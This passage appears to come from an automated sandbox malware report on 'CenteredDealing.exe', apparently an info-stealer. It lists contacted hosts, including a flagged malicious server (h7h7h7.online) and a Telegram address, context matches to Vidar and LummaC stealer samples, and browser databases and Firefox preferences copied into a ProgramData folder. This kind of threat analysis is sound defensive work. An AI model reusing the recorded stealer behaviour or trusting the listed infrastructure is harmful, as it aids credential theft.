                                                                                                                                                                        https://anglebug.com/7161chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://drive-autopush.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.google.com/search?q=$chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://anglebug.com/7162chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/5906chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/2517chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/4937chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://issuetracker.google.com/166809097chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://issuetracker.google.com/200067929chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://lens.google.com/v3/2chrome.exe, 00000011.00000003.2025823811.00006C780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1977099612.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://anglebug.com/7847chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000011.00000003.1977551360.00006C7800684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://lens.google.com/v3/uploadchrome.exe, 00000011.00000003.1977944173.00006C78006E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/3832chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg9z5fu3.12.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://drive-daily-6.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.google.comAccess-Control-Allow-Credentials:chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://drive-daily-0.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://drive-thirdparty.googleusercontent.com/32/type/chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://lens.google.com/uploadchrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://drive-daily-3.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/6651chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://goto.google.com/sme-bugs2echrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://anglebug.com/6574chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://www.broofa.comchromecache_98.19.drfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          142.250.186.174
                                                                                                                                                                                                                          		play.google.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                          149.154.167.99
                                                                                                                                                                                                                          		t.meUnited Kingdom
                                                                                                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                                          		unknownunknownfalse
                                                                                                                                                                                                                          216.58.212.174
                                                                                                                                                                                                                          		plus.l.google.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                          116.203.13.109
                                                                                                                                                                                                                          		h7h7h7.onlineGermany
                                                                                                                                                                                                                          		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                          172.217.16.132
                                                                                                                                                                                                                          		www.google.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse

                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1582918
                                                                                                                                                                                                                          Start date and time:2024-12-31 21:38:52 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 7m 3s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                                                                                                          Number of analysed new started processes analysed:24
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:CenteredDealing.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal92.troj.spyw.evad.winEXE@47/48@9/8
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          • Number of executed functions: 36
                                                                                                                                                                                                                          • Number of non-executed functions: 36
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.186.78, 142.250.185.67, 74.125.71.84, 142.250.184.238, 142.250.181.238, 142.250.186.163, 142.250.186.142, 142.250.185.170, 142.250.185.202, 142.250.186.74, 142.250.185.106, 142.250.186.138, 172.217.16.202, 216.58.212.170, 216.58.206.42, 142.250.185.74, 142.250.186.106, 142.250.184.234, 172.217.18.10, 216.58.206.74, 142.250.186.42, 142.250.185.138, 142.250.184.202, 2.22.50.144, 4.245.163.56, 184.28.90.27, 13.107.246.45
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • VT rate limit hit for: CenteredDealing.exe

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          No simulations

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          239.255.255.250https://readermodeext.info/ai-connectGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            https://ocemt-my.sharepoint.com/:o:/g/personal/cgremel_ocemt_edu/El0lVz9DgmtMsBazSuh3bdYBcfj71dOqNLuq6XsKZMLXlA?e=5%3axcx4cZ&at=9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                TieLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  https://password-changes.phishwall.net/XMzUzaXgwTnBGZU9XbU9kQnFIZk0vQ3hhQlNtUXJwaExCOTNDYnhpMG92ZHRNQjI5SHhmNUlLTC9JcmVVS2sraDgvUVZtd2YwVFROeGxlbDR0UXBkeGJOUkN3UGliUUNGVHZXWVJ2ek5hZ0FNV290djROWFRxN3JNazM1WlhNOUVLdnlqOEVlbXFaaFROMlltRDFFKzhmU3A0eEl4cE1tMFJmazVYOE5hc25oTjNIR0Q1UzJyNW5wTkNBPT0tLUdCVnp5RnltanNuQnVQWkgtLVA0Uy9TcENHeDltOGdwd282cnZiaEE9PQ==?cid=2317630324Get hashmaliciousHTMLPhisher, KnowBe4Browse
                                                                                                                                                                                                                                    http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                            http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                            http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/?setln=pl
                                                                                                                                                                                                                                            http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.org/
                                                                                                                                                                                                                                            http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • telegram.dog/
                                                                                                                                                                                                                                            LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                            • t.me/cinoshibot
                                                                                                                                                                                                                                            jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                            • t.me/cinoshibot

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            t.meover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            TELEGRAMRUEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            HETZNER-ASDEover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                            • 88.198.193.213
                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                            • 49.13.202.247
                                                                                                                                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.14.4
                                                                                                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                            • 5.9.64.57
                                                                                                                                                                                                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 136.243.250.139

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                                                                            GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 116.203.13.109
                                                                                                                                                                                                                                            • 149.154.167.99

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            !Set-up..exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\1vaa1n

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\8yu37g

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\9z5fu3

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):9571
                                                                                                                                                                                                                                                              Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\bs0r9z

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\kf37qi

                                                                                                                                                                                                                                                              Download File
